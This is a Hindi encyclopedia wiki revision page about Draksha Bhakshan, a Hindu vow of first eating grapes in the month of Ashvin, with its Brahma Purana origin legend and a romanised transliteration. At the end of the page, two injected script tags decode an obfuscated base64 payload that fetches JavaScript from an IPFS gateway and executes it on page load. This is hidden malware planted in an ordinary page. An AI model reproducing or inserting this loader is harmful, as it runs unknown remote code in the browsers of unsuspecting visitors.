Difference between revisions of "द्राक्षा भक्षण"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - ")</ref" to "</ref")
 
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*अंगूरों का प्रथम भक्षण होता है।
 
*अंगूरों का प्रथम भक्षण होता है।
*[[आश्विन]] में यह व्रत किया जाता है।<ref>कृत्यरत्नाकर (पृ0 303-304)</ref>  
+
*[[आश्विन]] में यह व्रत किया जाता है।<ref>कृत्यरत्नाकर (पृ0 303-304</ref>  
 
*[[ब्रह्म पुराण]] में ऐसा आया है कि समुद्र देवों द्वारा मिथित हुआ तो क्षीरसागर से एक सुन्दर नारी का उदभव हुआ और वह एक मनोरम लता के रूप में परिणत हो गयी और देवों ने प्रश्न किया—'यह कौन है? हम इसे प्रसन्नता से देखेंगे (हन्त द्रक्ष्याम हे वयम्) और इस लता को 'द्राक्षा' (अंगूर) की संज्ञा दी।  
 
*[[ब्रह्म पुराण]] में ऐसा आया है कि समुद्र देवों द्वारा मिथित हुआ तो क्षीरसागर से एक सुन्दर नारी का उदभव हुआ और वह एक मनोरम लता के रूप में परिणत हो गयी और देवों ने प्रश्न किया—'यह कौन है? हम इसे प्रसन्नता से देखेंगे (हन्त द्रक्ष्याम हे वयम्) और इस लता को 'द्राक्षा' (अंगूर) की संज्ञा दी।  
 
*जब लता के अंगूर पक जाते हैं, तो उसकी पूजा पुष्पों, धूप, नैवेद्य आदि से की जाती है और इसके उपरान्त दो बच्चों तथा दो बूढ़ों को सम्मानित किया जाता है और तब गानों एवं नाच का कार्यक्रम किया जाता है।
 
*जब लता के अंगूर पक जाते हैं, तो उसकी पूजा पुष्पों, धूप, नैवेद्य आदि से की जाती है और इसके उपरान्त दो बच्चों तथा दो बूढ़ों को सम्मानित किया जाता है और तब गानों एवं नाच का कार्यक्रम किया जाता है।

Latest revision as of 12:50, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • aangooroan ka pratham bhakshan hota hai.
  • ashvin mean yah vrat kiya jata hai.[1]
  • brahm puran mean aisa aya hai ki samudr devoan dvara mithit hua to kshirasagar se ek sundar nari ka udabhav hua aur vah ek manoram lata ke roop mean parinat ho gayi aur devoan ne prashn kiya—'yah kaun hai? ham ise prasannata se dekheange (hant drakshyam he vayamh) aur is lata ko 'draksha' (aangoor) ki sanjna di.
  • jab lata ke aangoor pak jate haian, to usaki pooja pushpoan, dhoop, naivedy adi se ki jati hai aur isake uparant do bachchoan tatha do boodhoan ko sammanit kiya jata hai aur tab ganoan evan nach ka karyakram kiya jata hai.


tika tippani aur sandarbh

  1. krityaratnakar (pri0 303-304

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>